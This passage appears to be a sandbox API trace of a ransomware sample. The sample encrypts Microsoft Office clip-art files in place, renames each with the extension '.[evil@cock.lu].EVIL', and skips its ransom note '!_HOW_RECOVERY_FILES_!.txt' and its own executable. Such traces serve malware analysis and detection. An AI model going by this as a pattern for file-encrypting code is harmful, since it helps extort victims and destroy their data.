Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0109.049] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0109.049] __uncaught_exception () returned 0x84b1160800 [0109.050] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0109.050] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif.[evil@cock.lu].evil")) returned 1 [0109.051] ??_V@YAXPEAX@Z () returned 0x1 [0109.054] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF", dwFileAttributes=0x200) returned 0 [0109.054] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.054] wcsstr (_Str="BD19563_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.055] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 69 [0109.055] wcscmp (_String1="BD19563_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.055] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19563_.GIF") returned 0x0 [0109.055] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 0x45 [0109.055] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.057] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4fe6, lpOverlapped=0x0) returned 1 [0109.067] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.067] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.067] _errno () returned 0x84b1160840 [0109.067] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.067] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5000, lpOverlapped=0x0) returned 1 [0109.067] CloseHandle (hObject=0x1a8) returned 1 [0109.067] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0109.067] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0109.068] __uncaught_exception () returned 0x84b1160800 [0109.068] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0109.068] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif.[evil@cock.lu].evil")) returned 1 [0109.069] ??_V@YAXPEAX@Z () returned 0x1 [0109.072] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF", dwFileAttributes=0x200) returned 0 [0109.072] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.073] wcsstr (_Str="BD19582_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.073] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 69 [0109.073] wcscmp (_String1="BD19582_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.073] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19582_.GIF") returned 0x0 [0109.073] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 0x45 [0109.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.075] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d75, lpOverlapped=0x0) returned 1 [0109.084] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.084] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0109.085] _errno () returned 0x84b1160840 [0109.085] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.085] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d80, lpOverlapped=0x0) returned 1 [0109.085] CloseHandle (hObject=0x1a8) returned 1 [0109.085] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0109.085] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0109.085] __uncaught_exception () returned 0x84b1160800 [0109.085] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0109.086] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.[evil@cock.lu].evil")) returned 1 [0109.086] ??_V@YAXPEAX@Z () returned 0x1 [0109.090] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF", dwFileAttributes=0x200) returned 0 [0109.090] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0109.090] wcsstr (_Str="BD19695_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0109.090] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 69 [0109.090] wcscmp (_String1="BD19695_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0109.090] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19695_.WMF") returned 0x0 [0109.090] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 0x45 [0109.091] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0109.093] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x32b6, lpOverlapped=0x0) returned 1 [0110.120] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.120] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.120] _errno () returned 0x84b1160840 [0110.120] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.120] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x32c0, lpOverlapped=0x0) returned 1 [0110.120] CloseHandle (hObject=0x1a8) returned 1 [0110.120] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.120] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.121] __uncaught_exception () returned 0x84b1160800 [0110.121] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.121] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.[evil@cock.lu].evil")) returned 1 [0110.121] ??_V@YAXPEAX@Z () returned 0x1 [0110.124] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF", dwFileAttributes=0x200) returned 0 [0110.124] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.152] wcsstr (_Str="BD19827_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.152] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 69 [0110.152] wcscmp (_String1="BD19827_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.152] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19827_.WMF") returned 0x0 [0110.152] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 0x45 [0110.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.154] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x25ee, lpOverlapped=0x0) returned 1 [0110.168] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.168] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.168] _errno () returned 0x84b1160840 [0110.168] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.168] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2600, lpOverlapped=0x0) returned 1 [0110.169] CloseHandle (hObject=0x1a8) returned 1 [0110.169] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.169] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.169] __uncaught_exception () returned 0x84b1160800 [0110.169] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.169] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf.[evil@cock.lu].evil")) returned 1 [0110.170] ??_V@YAXPEAX@Z () returned 0x1 [0110.173] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF", dwFileAttributes=0x200) returned 0 [0110.173] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.173] wcsstr (_Str="BD19828_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.173] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 69 [0110.173] wcscmp (_String1="BD19828_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.173] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19828_.WMF") returned 0x0 [0110.173] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 0x45 [0110.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.174] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2244, lpOverlapped=0x0) returned 1 [0110.177] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.177] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.177] _errno () returned 0x84b1160840 [0110.177] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.177] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2260, lpOverlapped=0x0) returned 1 [0110.177] CloseHandle (hObject=0x1a8) returned 1 [0110.177] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.177] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.177] __uncaught_exception () returned 0x84b1160800 [0110.177] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.178] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf.[evil@cock.lu].evil")) returned 1 [0110.178] ??_V@YAXPEAX@Z () returned 0x1 [0110.181] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF", dwFileAttributes=0x200) returned 0 [0110.181] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.181] wcsstr (_Str="BD19986_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.181] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 69 [0110.181] wcscmp (_String1="BD19986_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.181] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19986_.WMF") returned 0x0 [0110.181] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 0x45 [0110.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.183] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3896, lpOverlapped=0x0) returned 1 [0110.232] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.232] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.232] _errno () returned 0x84b1160840 [0110.232] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.232] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38a0, lpOverlapped=0x0) returned 1 [0110.232] CloseHandle (hObject=0x1a8) returned 1 [0110.232] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.232] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.233] __uncaught_exception () returned 0x84b1160800 [0110.233] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.233] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf.[evil@cock.lu].evil")) returned 1 [0110.233] ??_V@YAXPEAX@Z () returned 0x1 [0110.236] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF", dwFileAttributes=0x200) returned 0 [0110.236] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.236] wcsstr (_Str="BD19988_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.236] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 69 [0110.236] wcscmp (_String1="BD19988_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.236] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD19988_.WMF") returned 0x0 [0110.236] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 0x45 [0110.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.238] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4780, lpOverlapped=0x0) returned 1 [0110.250] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.250] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.250] _errno () returned 0x84b1160840 [0110.250] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x47a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x47a0, lpOverlapped=0x0) returned 1 [0110.250] CloseHandle (hObject=0x1a8) returned 1 [0110.251] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.251] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.251] __uncaught_exception () returned 0x84b1160800 [0110.251] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.251] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf.[evil@cock.lu].evil")) returned 1 [0110.252] ??_V@YAXPEAX@Z () returned 0x1 [0110.254] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF", dwFileAttributes=0x200) returned 0 [0110.254] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0110.255] wcsstr (_Str="BD20013_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0110.255] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 69 [0110.255] wcscmp (_String1="BD20013_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0110.255] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD20013_.WMF") returned 0x0 [0110.255] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 0x45 [0110.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.256] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b32, lpOverlapped=0x0) returned 1 [0110.258] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.258] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0110.258] _errno () returned 0x84b1160840 [0110.259] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.259] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b40, lpOverlapped=0x0) returned 1 [0110.259] CloseHandle (hObject=0x1a8) returned 1 [0110.259] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0110.259] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0110.259] __uncaught_exception () returned 0x84b1160800 [0110.259] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0110.259] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft 